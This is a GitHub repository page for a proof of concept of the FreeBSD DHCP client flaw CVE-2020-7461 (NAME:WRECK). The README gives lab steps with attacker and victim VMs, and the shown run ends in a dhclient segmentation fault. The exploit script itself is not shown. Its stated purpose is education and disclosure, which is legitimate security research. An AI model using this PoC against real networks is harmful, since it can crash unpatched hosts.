Skip to content

knqyf263/CVE-2020-7461

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

attacker

attacker

 
 

imgs

imgs

 
 

victim

victim

 
 

.gitignore

.gitignore

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

poc.py

poc.py

 
 

Repository files navigation

CVE-2020-7461

PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD

For educational purposes only

Environment

  • Host: macOS 11.2.1
  • Vagrant: 2.2.15
  • Victim: FreeBSD 12.1-STABLE r364849
  • Attacker: Ubuntu 20.04

Disclaimer

This PoC will cause DoS instead of RCE to prevent abuse.

PoC

wreck

Turn off DHCP server in VirtualBox

dhcp

Launch VMs

$ cd victim
$ vagrant up
$ cd ..

$ cd attacker
$ vagrant up
$ vagrant ssh
vagrant@vagrant:~$ sudo apt -y update && apt -y install python3 python3-pip
vagrant@vagrant:~$ wget https://raw.githubusercontent.com/knqyf263/CVE-2020-7461/main/poc.py
vagrant@vagrant:~$ python3 poc.py
Sniffing...

Run dhclient

Open another terminal

$ cd victim
$ vagrant ssh
vagrant@freebsd:~ % sudo dhclient em1
DHCPREQUEST on em1 to 255.255.255.255 port 67
Invalid forward pointer in DHCP Domain Search option compression.
Segmentation fault

References

Author

Teppei Fukuda

About

PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Security policy

Security policy
Activity

Stars

15 stars

Watchers

4 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages